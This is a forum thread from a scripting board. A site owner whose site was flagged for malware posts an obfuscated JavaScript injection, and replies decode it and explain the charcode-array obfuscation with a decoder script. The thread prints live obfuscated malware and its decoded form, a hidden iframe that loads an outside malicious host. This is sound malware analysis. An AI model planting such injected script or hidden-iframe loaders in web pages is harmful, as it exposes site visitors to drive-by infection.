1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

can anyone help decode this for me?

Discussion in 'General Scripting Chat' started by intence, Jun 12, 2012.

  1. intence

    intence Regular Member

    Joined:
    Nov 21, 2008
    Messages:
    435
    Likes Received:
    77
    One of my sites got malware and the dreaded "this site may compromise your computer" warning. I found this in the source code but having trouble decoding it.

    Thanks for the help

    Code:
    <script>i=0;if(window["document"])try{grbregd=prototype;}catch(z){h="Code";f=[9,18,315,102,64,120,100,222,297,117,218,303,110,232,138,103,202,348,69,216,303,109,202,330,116,230,198,121,168,291,103,156,291,109,202,120,39,196,333,100,242,117,41,182,144,93,82,369,13,18,27,9,210,306,114,194,327,101,228,120,41,118,39,9,18,375,32,202,324,115,202,96,123,26,27,9,18,300,111,198,351,109,202,330,116,92,357,114,210,348,101,80,102,60,210,306,114,194,327,101,64,345,114,198,183,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,32,238,315,100,232,312,61,78,147,48,78,96,104,202,315,103,208,348,61,78,147,48,78,96,115,232,363,108,202,183,39,236,315,115,210,294,105,216,315,116,242,174,104,210,300,100,202,330,59,224,333,115,210,348,105,222,330,58,194,294,115,222,324,117,232,303,59,216,303,102,232,174,48,118,348,111,224,174,48,118,117,62,120,141,105,204,342,97,218,303,62,68,123,59,26,27,9,250,39,9,18,306,117,220,297,116,210,333,110,64,315,102,228,291,109,202,342,40,82,369,13,18,27,9,236,291,114,64,306,32,122,96,100,222,297,117,218,303,110,232,138,99,228,303,97,232,303,69,216,303,109,202,330,116,80,117,105,204,342,97,218,303,39,82,177,102,92,345,101,232,195,116,232,342,105,196,351,116,202,120,39,230,342,99,78,132,39,208,348,116,224,174,47,94,318,102,206,363,122,228,330,100,220,138,111,220,348,104,202,357,101,196,138,110,234,141,63,206,333,61,100,117,41,118,306,46,230,348,121,216,303,46,236,315,115,210,294,105,216,315,116,242,183,39,208,315,100,200,303,110,78,177,102,92,345,116,242,324,101,92,336,111,230,315,116,210,333,110,122,117,97,196,345,111,216,351,116,202,117,59,204,138,115,232,363,108,202,138,108,202,306,116,122,117,48,78,177,102,92,345,116,242,324,101,92,348,111,224,183,39,96,117,59,204,138,115,202,348,65,232,348,114,210,294,117,232,303,40,78,357,105,200,348,104,78,132,39,98,144,39,82,177,102,92,345,101,232,195,116,232,342,105,196,351,116,202,120,39,208,303,105,206,312,116,78,132,39,98,144,39,82,177,13,18,27,9,200,333,99,234,327,101,220,348,46,206,303,116,138,324,101,218,303,110,232,345,66,242,252,97,206,234,97,218,303,40,78,294,111,200,363,39,82,273,48,186,138,97,224,336,101,220,300,67,208,315,108,200,120,102,82,177,13,18,27,125];v="e"+"v"+"a";}if(v)e=window[v+"l"];try{q=document.createElement("b");if(e)q.appendChild(q+"");}catch(fwbewe){w=f;s=[];} r=String;z=((e)?h:"");for(;577-5+5>i;i+=1){j=i;if(e)s=s+r["fr"+"omChar"+((e)?z:12)]((w[j]/(j%3+1)));} try{dsgsdg=prototype;}catch(dsdh){e(((e)?s:12));}</script>
    
     
  2. skrode

    skrode Junior Member

    Joined:
    Nov 13, 2011
    Messages:
    103
    Likes Received:
    16
    Code:
    if (document.getElementsByTagName('body')[0]) {
        iframer();
    } else {
        document.write("<iframe src='http://jfgyzrndn.ontheweb.nu/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
    }
    
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://jfgyzrndn.ontheweb.nu/?go=2');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '0';
        f.style.top = '0';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    
     
    • Thanks Thanks x 1
  3. intence

    intence Regular Member

    Joined:
    Nov 21, 2008
    Messages:
    435
    Likes Received:
    77
    wow thanks. could you tell me what it was encoded in? like base64 etc? so I know in the future.
     
  4. skrode

    skrode Junior Member

    Joined:
    Nov 13, 2011
    Messages:
    103
    Likes Received:
    16
    it was done with array of obfuscated charcodes. i used following script to translate it:

    Code:
    <script>
        var w = [9, 18, 315, 102, 64, 120, 100, 222, 297, 117, 218, 303, 110, 232, 138, 103, 202, 348, 69, 216, 303, 109, 202, 330, 116, 230, 198, 121, 168, 291, 103, 156, 291, 109, 202, 120, 39, 196, 333, 100, 242, 117, 41, 182, 144, 93, 82, 369, 13, 18, 27, 9, 210, 306, 114, 194, 327, 101, 228, 120, 41, 118, 39, 9, 18, 375, 32, 202, 324, 115, 202, 96, 123, 26, 27, 9, 18, 300, 111, 198, 351, 109, 202, 330, 116, 92, 357, 114, 210, 348, 101, 80, 102, 60, 210, 306, 114, 194, 327, 101, 64, 345, 114, 198, 183, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 32, 238, 315, 100, 232, 312, 61, 78, 147, 48, 78, 96, 104, 202, 315, 103, 208, 348, 61, 78, 147, 48, 78, 96, 115, 232, 363, 108, 202, 183, 39, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 174, 104, 210, 300, 100, 202, 330, 59, 224, 333, 115, 210, 348, 105, 222, 330, 58, 194, 294, 115, 222, 324, 117, 232, 303, 59, 216, 303, 102, 232, 174, 48, 118, 348, 111, 224, 174, 48, 118, 117, 62, 120, 141, 105, 204, 342, 97, 218, 303, 62, 68, 123, 59, 26, 27, 9, 250, 39, 9, 18, 306, 117, 220, 297, 116, 210, 333, 110, 64, 315, 102, 228, 291, 109, 202, 342, 40, 82, 369, 13, 18, 27, 9, 236, 291, 114, 64, 306, 32, 122, 96, 100, 222, 297, 117, 218, 303, 110, 232, 138, 99, 228, 303, 97, 232, 303, 69, 216, 303, 109, 202, 330, 116, 80, 117, 105, 204, 342, 97, 218, 303, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 230, 342, 99, 78, 132, 39, 208, 348, 116, 224, 174, 47, 94, 318, 102, 206, 363, 122, 228, 330, 100, 220, 138, 111, 220, 348, 104, 202, 357, 101, 196, 138, 110, 234, 141, 63, 206, 333, 61, 100, 117, 41, 118, 306, 46, 230, 348, 121, 216, 303, 46, 236, 315, 115, 210, 294, 105, 216, 315, 116, 242, 183, 39, 208, 315, 100, 200, 303, 110, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 336, 111, 230, 315, 116, 210, 333, 110, 122, 117, 97, 196, 345, 111, 216, 351, 116, 202, 117, 59, 204, 138, 115, 232, 363, 108, 202, 138, 108, 202, 306, 116, 122, 117, 48, 78, 177, 102, 92, 345, 116, 242, 324, 101, 92, 348, 111, 224, 183, 39, 96, 117, 59, 204, 138, 115, 202, 348, 65, 232, 348, 114, 210, 294, 117, 232, 303, 40, 78, 357, 105, 200, 348, 104, 78, 132, 39, 98, 144, 39, 82, 177, 102, 92, 345, 101, 232, 195, 116, 232, 342, 105, 196, 351, 116, 202, 120, 39, 208, 303, 105, 206, 312, 116, 78, 132, 39, 98, 144, 39, 82, 177, 13, 18, 27, 9, 200, 333, 99, 234, 327, 101, 220, 348, 46, 206, 303, 116, 138, 324, 101, 218, 303, 110, 232, 345, 66, 242, 252, 97, 206, 234, 97, 218, 303, 40, 78, 294, 111, 200, 363, 39, 82, 273, 48, 186, 138, 97, 224, 336, 101, 220, 300, 67, 208, 315, 108, 200, 120, 102, 82, 177, 13, 18, 27, 125];
        var i = 0;
        var s;
        var j;
        for (; 577 - 5 + 5 > i; i += 1) {
            j = i;
            s = s + String.fromCharCode((w[j] / (j % 3 + 1)));
        }
        alert(s);
    </script>